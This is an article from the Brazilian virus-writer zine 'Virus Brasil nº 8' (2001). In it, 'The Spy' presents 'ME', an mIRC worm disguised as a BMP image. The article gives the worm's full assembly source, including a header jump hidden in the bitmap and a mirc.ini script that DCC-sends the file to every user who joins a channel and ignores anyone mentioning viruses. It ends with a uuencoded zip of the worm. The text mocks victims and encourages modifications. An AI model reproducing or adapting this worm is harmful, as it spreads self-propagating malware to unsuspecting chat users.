Virus Brasil nº8:(bmp.txt):20/02/2001 << Back To Virus Brasil nº 8
────────────────────────────────────────────────────────────────────────── __ __ | | | | |__) |\/| |/\| |__| | \ | | ────────────────────────────────────────────────────────────────────────── ─────────────────────────────────────────────────── 4 - ME.bmp por the Spy do zine G9N traduzido por nim_bus@hotmail.com ─────────────────────────────────────────────────── Dos originais de "The Spy" no zine G9N Oi pessoal! Esse nao eh uma novo programa para travar o WinMe, nao eh nao. Eh uma imagem .BMP, que com uma pequena ajuda do usuario, se copia para o diretorio do mIRC como Me.bmp, e substitui o scrip do mirc , e o envia quando ocorre o evento "onjoin" para outro usuario (que fara o mesmo e assim por diante !) Ok, ok , para os "newbies", aqui esta o truque que o worm utiliza, o .bmp deve ser renomeado para .com, se voce abri r o arquivo .bmp ele dira "Rename me to .com" hahahaha. Essa BMP e uma imagem de 16 cores,em parte da header de um arquivo .bmp pode ser executada sem maiores problemas, entao colocou-se um jump no comeco da imagem, onde redireciono para a parte onde esta o codigo dentro do arquivo. Em outras palavras, essa imagem/worm, usa o "SUS", mas que porra e essa de "SUS" ? Simple, ao pe da letra, "Stupid User System", algo como sistema para usuarios estupidos... :) hahaha Bem, modificacoes sao possiveis, tais como fazer o worm menor e/ou colocar uma mensagem melhor como um "Tente renomear-me para .COM" Ae Khaled, agora eles vao nos dizer que nos temos que banir os ar- quivos .BMP :), nem me venha dizer que nao eh engracado, porque eh ! ;) Isso ai, segue, segue abaixo o source do worm... ──────────────────────────────────────────────────────────────────────────── __ __ / __ . __ __ __ __ ___ __ | | | | \ | | _ | | |_ | | |\| | |_ |__ |__| |__/ | |__| |__| | |__| | | | |__ ──────────────────────────────────────────────────────────────────────────── ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; ; ME by Socrates aka The Spy aka ... ; mIRC Worm / Image ;; .model tiny .code org 100h hereisme: bmp db 42h,4Dh,0Ah,06h,00h,00h ; db 0CDh,20h,00h jmp ak db 00h,76h,00h,00h,00h,28h,00h db 00h,00h,83h,00h,00h,00h,15h,00h,00h,00h,01h,00h,04h,00h,00h,00h db 00h,00h,94h,05h,00h,00h,0CEh,0Eh,00h,00h,0D8h,0Eh,00h,00h,00h,00h db 00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,0FFh,0FFh,0FFh,00h,0F7h,0BFh db 0D8h,0F3h,5Bh,00h,35h,25h,0F9h,0BFh,00h,10h,0DCh,81h,0DCh,0Bh,00h,0 db 00h,00h,00h,00h,79h,1Ah,0F7h,0BFh,18h,84h,00h,00h,0F4h,0F8h,5Bh,00h db 2Eh,19h,0F7h,0BFh,0CFh,31h,0F6h,83h,28h,83h,0B5h,7Fh,08h,30h,43h,00h db 42h,0F4h,0B2h,7Fh,70h,1Bh ak: mov ah,3bh lea dx,mircdir int 21h jc getout mov ah,3Ch xor cx,cx lea dx,me int 21h xchg ax,bx mov ah,40h mov cx,(the_end-hereisme) lea dx,hereisme int 21h call closef mov ax,3D02h lea dx,scriini int 21h jc getout xchg ax,bx call seekeof xchg dx,ax mov ax,4200h sub dx,5 int 21h mov ah,3Fh mov cx,2 lea dx,mircdir int 21h mov ax,'kc' cmp word ptr [mircdir],ax je getout call seekeof mov ah,40h mov cx,zero-script lea dx,script int 21h closef: mov ah,3Eh int 21h getout: ret seekeof: mov ax,4202h xor cx,cx cwd int 21h ret mircdir db 'c:\mirc\',0 scriini db 'mirc.ini',0 me db 'c:\mirc\me.bmp',0 script db 13,10,'[script]',13,10 n0 db 'n0=; IRC Worm/Image by Socrates',13,10 n1 db 'n1=ON 1:JOIN:#:{ /if ( $nick == $me ) { halt } else' db ' { /dcc send $nick $mircdirme.bmp | ' db '/ignore $nick }',13,10 n2 db 'n2=ON 1:TEXT:*me*:*:/ignore $nick',13,10 n3 db 'n3=ON 1:TEXT:*Worm*:*:/ignore $nick',13,10 n4 db 'n4=ON 1:TEXT:*Virus*:*:/ignore $nick',13,10 n5 db 'n5=ON 1:TEXT:*infect*:*:/ignore $nick',13,10 zero db 0 db 11h,11h,11h,11h,11h,11h,11h,11h,11h ;,11h ;db 11h,11h,11h,11h,11h,11h,11h,11h,11h,11h,11h,11h,11h,11h,11h,11h ;db 11h,11h,11h,11h,11h,11h,11h,11h,11h,11h,11h,11h,11h,11h,11h,11h ;db 11h,11h,11h,11h,11h,11h,11h,11h,11h,11h,11h,11h,11h,11h,11h,11h ;db 11h,11h,11h,11h,11h,11h,11h,10h,00h,00h,11h,11h,11h,11h,11h,11h ;db 11h,11h,11h,11h,11h,11h,11h,11h,11h,11h,11h,11h,11h,11h,11h,11h ;db 11h,11h,11h,11h,11h,11h,11h,11h,11h,11h,11h,11h,11h,11h,11h,11h ;db 11h,11h,11h,11h,11h,11h,11h,11h,11h,11h,11h,11h,11h,11h,11h,11h ;db 11h,11h,11h,11h,11h,11h,11h,11h,11h,11h,11h,10h,00h,00h,11h,11h ;db 11h,11h,11h,11h,11h,11h,11h,11h,11h,11h,11h,11h,11h,11h,11h,11h ;db 11h,11h,11h,11h,11h,11h,11h,11h,11h,11h,11h,11h,11h,11h,11h,11h ;db 11h,11h,11h,11h,11h,11h,11h,11h,11h,11h,11h,11h,11h,11h,11h,11h ;db 11h,11h,11h,11h,11h,11h,11h,11h,11h,11h,11h,11h,11h,11h,11h,10h ;db 00h,00h,11h,11h,11h,11h,11h,11h,11h,11h,11h,11h,11h,11h,11h,11h ;db 11h,11h,11h,11h,11h,11h,11h,11h,11h,11h,11h,11h,11h,11h,11h,11h ;db 11h,11h,11h,11h,11h,11h,11h,11h,11h,11h,11h,11h,11h,11h,11h,11h ;db 11h,11h,11h,11h,11h,11h,11h,11h,11h,11h,11h,11h,11h,11h,11h,11h ;266 ;db 11h,11h,11h,10h,00h,00h,11h,11h,11h,11h,11h,11h,11h,11h,11h,11h ;db 11h,11h,11h,11h,11h,11h,11h,11h,11h,11h,11h,11h,11h,11h,11h,11h ;db 11h,11h,11h,11h,11h,11h,11h,11h,11h,11h,11h,11h,11h,11h,11h,11h ;db 11h,11h,11h,11h,11h,11h,11h,11h,11h,11h,11h,11h,11h,11h,11h,11h ;64 ;db 11h,11h,11h,11h,11h,11h,11h,10h,00h,00h,11h,11h,11h,11h,11h,11h ;db 11h,11h,11h,11h,11h,11h,11h,11h,11h,11h,11h,11h,11h,11h,11h,11h ;db 11h,11h,11h,11h,11h,11h,11h,11h,11h,11h,11h,11h,11h,11h,11h,11h ;db 11h,11h,11h,11h,11h,11h,11h,11h,11h,11h,11h,11h,11h,11h,11h,11h ;64 ;394 ;db 11h,11h,11h,11h,11h,11h,11h,11h,11h,11h,11h,10h,00h,00h,11h,11h ;db 11h,11h,11h,11h,11h,11h,11h,11h,11h,11h,11h,11h,11h,11h,11h,11h ;db 11h,11h,11h,11h,11h,11h,11h,11h,11h,11h,11h,11h,11h,11h,11h,11h ;48 db 11h,11h,11h,11h,11h,11h,11h,11h,11h,11h,11h,11h,11h,11h,11h,11h db 11h,11h,11h,11h,11h,11h,11h,11h,11h,11h,11h,11h,11h,11h,11h,10h db 00h,00h,11h,11h,11h,11h,11h,11h,11h,11h,11h,11h,11h,11h,11h,11h db 11h,11h,11h,11h,11h,11h,11h,11h,11h,11h,11h,11h,11h,11h,11h,11h db 11h,11h,11h,11h,11h,11h,11h,11h,11h,11h,11h,11h,11h,11h,11h,11h db 11h,11h,11h,11h,11h,11h,11h,11h,11h,11h,11h,11h,11h,11h,11h,11h db 11h,11h,11h,10h,00h,00h,11h,11h,11h,00h,01h,10h,11h,00h,00h,10h db 00h,10h,00h,10h,00h,00h,00h,00h,00h,00h,11h,00h,00h,11h,11h,11h db 11h,00h,00h,00h,01h,10h,00h,01h,11h,11h,11h,11h,10h,00h,11h,11h db 00h,01h,11h,11h,11h,11h,11h,00h,11h,11h,10h,00h,01h,11h,00h,01h db 10h,00h,00h,00h,11h,11h,11h,10h,00h,00h,11h,11h,11h,10h,11h,01h db 10h,11h,11h,11h,01h,11h,01h,10h,11h,10h,11h,01h,01h,01h,10h,11h db 11h,11h,11h,11h,11h,10h,10h,10h,11h,01h,11h,11h,11h,11h,11h,11h db 01h,11h,01h,10h,11h,10h,11h,11h,11h,11h,11h,11h,11h,11h,01h,11h db 11h,10h,11h,10h,11h,01h,01h,01h,11h,11h,11h,10h,00h,00h,11h,11h db 11h,10h,00h,11h,10h,00h,00h,11h,01h,11h,01h,11h,00h,00h,11h,01h db 01h,01h,10h,00h,00h,11h,11h,11h,11h,10h,10h,10h,11h,00h,00h,01h db 11h,11h,11h,11h,01h,11h,11h,10h,11h,10h,11h,11h,11h,11h,11h,11h db 11h,11h,01h,11h,11h,10h,11h,10h,11h,01h,01h,01h,11h,11h,11h,10h db 00h,00h,11h,11h,11h,10h,11h,01h,10h,11h,10h,11h,00h,11h,01h,10h db 11h,10h,11h,01h,01h,01h,10h,11h,10h,11h,11h,11h,11h,10h,10h,10h db 11h,01h,11h,01h,11h,11h,11h,11h,01h,11h,11h,10h,11h,10h,11h,11h db 11h,11h,11h,11h,11h,11h,01h,11h,01h,10h,11h,10h,11h,01h,01h,01h db 11h,11h,11h,10h,00h,00h,11h,11h,11h,10h,11h,01h,11h,00h,01h,10h db 01h,00h,11h,11h,00h,01h,10h,00h,10h,11h,11h,00h,01h,11h,11h,11h db 11h,00h,01h,01h,11h,10h,00h,11h,11h,11h,11h,10h,00h,00h,11h,11h db 00h,01h,11h,11h,11h,11h,11h,11h,11h,11h,10h,00h,01h,11h,00h,01h db 10h,00h,10h,11h,11h,11h,11h,10h,00h,00h,11h,11h,11h,10h,11h,01h db 11h,11h,11h,11h,11h,11h,11h,11h,11h,11h,11h,11h,11h,11h,11h,11h db 11h,11h,11h,11h,11h,11h,11h,11h,11h,11h,11h,11h,11h,11h,11h,11h db 01h,11h,11h,11h,11h,11h,11h,11h,11h,11h,11h,11h,11h,11h,11h,11h db 11h,11h,11h,11h,11h,11h,11h,11h,11h,11h,11h,10h,00h,00h,11h,11h db 11h,00h,00h,11h,11h,11h,11h,11h,11h,11h,11h,11h,11h,11h,11h,11h db 11h,11h,11h,11h,11h,11h,11h,11h,11h,11h,11h,11h,11h,11h,11h,11h db 11h,11h,11h,11h,11h,11h,11h,11h,11h,11h,11h,11h,11h,11h,11h,11h db 11h,11h,11h,11h,11h,11h,11h,11h,11h,11h,11h,11h,11h,11h,11h,10h db 00h,00h,11h,11h,11h,11h,11h,11h,11h,11h,11h,11h,11h,11h,11h,11h db 11h,11h,11h,11h,11h,11h,11h,11h,11h,11h,11h,11h,11h,11h,11h,11h db 11h,11h,11h,11h,11h,11h,11h,11h,11h,11h,11h,11h,11h,11h,11h,11h db 11h,11h,11h,11h,11h,11h,11h,11h,11h,11h,11h,11h,11h,11h,11h,11h db 11h,11h,11h,10h,00h,00h,11h,11h,11h,11h,11h,11h,11h,11h,11h,11h db 11h,11h,11h,11h,11h,11h,11h,11h,11h,11h,11h,11h,11h,11h,11h,11h db 11h,11h,11h,11h,11h,11h,11h,11h,11h,11h,11h,11h,11h,11h,11h,11h db 11h,11h,11h,11h,11h,11h,11h,11h,11h,11h,11h,11h,11h,11h,11h,11h db 11h,11h,11h,11h,11h,11h,11h,10h,00h,00h,11h,11h,11h,11h,11h,11h db 11h,11h,11h,11h,11h,11h,11h,11h,11h,11h,11h,11h,11h,11h,11h,11h db 11h,11h,11h,11h,11h,11h,11h,11h,11h,11h,11h,11h,11h,11h,11h,11h db 11h,11h,11h,11h,11h,11h,11h,11h,11h,11h,11h,11h,11h,11h,11h,11h db 11h,11h,11h,11h,11h,11h,11h,11h,11h,11h,11h,10h,00h,00h,11h,11h db 11h,11h,11h,11h,11h,11h,11h,11h,11h,11h,11h,11h,11h,11h,11h,11h db 11h,11h,11h,11h,11h,11h,11h,11h,11h,11h,11h,11h,11h,11h,11h,11h db 11h,11h,11h,11h,11h,11h,11h,11h,11h,11h,11h,11h,11h,11h,11h,11h db 11h,11h,11h,11h,11h,11h,11h,11h,11h,11h,11h,11h,11h,11h,11h,10h db 00h,00h,11h,11h,11h,11h,11h,11h,11h,11h,11h,11h,11h,11h,11h,11h db 11h,11h,11h,11h,11h,11h,11h,11h,11h,11h,11h,11h,11h,11h,11h,11h db 11h,11h,11h,11h,11h,11h,11h,11h,11h,11h,11h,11h,11h,11h,11h,11h db 11h,11h,11h,11h,11h,11h,11h,11h,11h,11h,11h,11h,11h,11h,11h,11h db 11h,11h,11h,10h,00h,00h,11h,11h,11h,11h,11h,11h,11h,11h,11h,11h db 11h,11h,11h,11h,11h,11h,11h,11h,11h,11h,11h,11h,11h,11h,11h,11h db 11h,11h,11h,11h,11h,11h,11h,11h,11h,11h,11h,11h,11h,11h,11h,11h db 11h,11h,11h,11h,11h,11h,11h,11h,11h,11h,11h,11h,11h,11h,11h,11h db 11h,11h,11h,11h,11h,11h,11h,10h,00h,00h the_end: end hereisme ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; Socrates aka The Spy aka (wot? do u think im goin to tell u? no way!) mail -> v.exe@bigfoot.com <- Please if u can, use PGP G9N! -> http://g9n.gq.nu/ <- G9N Vx Zine, werkin for da # 2! Segue abaixo o worm uuencodado _=_ _=_ Part 001 of 001 of file Me.zip _=_ begin 666 Me.zip M4$L#!!0``@`(`"N7_BAT5+6?)@(```H&```&````364N8FUP[9+/:Q-!%,>_ M$VR02.O.0?#'98(18@Y)8UK$K5%)\1#!%FI1(?60;K9U:7<3=E>AU%(D_@%B MO?AO2(1T+SEXZB%Z+;1'#T'Q9#$*0IS9W30)+*9@CWW+[+XW\WG?]V9F<_<C M8>";\1K/`<3YJ/)QC@^"4Q#V=@3X-`;LCF'`.IT.VHW='P5,7OG=@+3_<O^, MM[)VL=TX_PHX^%5`\D*[\3G]LQJO?M@\/3Z-W,'[S<JEVI2S1YI1<ZYV,[/C M?.?N5NW.=B3L@+NMZZB'LLX7`:2W6DF\J2-7_3K2C-9N;X?@9M:5E1OA/6+3 MUEGPS`1Q_O#9VJUF]&,]E,OLO...(B_HFJDL0+R3FJ&A.Z.KR46]@M%(P5), MK6(_&8T8X]DIEI^;9H_*II[*Z\5EE2VNL0=EQ2S:JL6!='9VAJ7E>[/Y&?FR MO,Y2VA*+LYBA*2LLFV4Q7657V3I[6ERUV0935RV51ZF2HC!+-4H^&!/U2YKI M=<!><)5EHVRJ_O(&KW/-JS-_]_&\G-#5A)R0!R".9/H1T7`0--$//=3,9U80 M-=E/:<:2JM@!&.@13<*1T2$:(!(%)/=QC7K2XL^40#Q08&X.1$1$$ES,TY`H M%Z&4B`_WB1N)>8E'GNNOT6Y$?;*G`=?AG&A`:'A]"`UXU?VL?VAX1=#7A]3K M(U"#!&B([1%WS_Q0NEL'9R0<GIM_'K1W'A(=T!AB9.B]X/_O]CC^CQ.-8];X M"U!+`0(4`!0``@`(`"N7_BAT5+6?)@(```H&```&````````````(`"V@0`` >``!-92YB;7!02P4&``````$``0`T````2@(````` ` end _=_ _=_ Part 001 of 001 of file Me.zip _=_ E' isso, valeu The Spy ──────────────────────────────────────────────────────────────────────────── Copyright ╕ 2001, Vírus Brasil ⌐ ────────────────────────────────────────────────────────────────────────────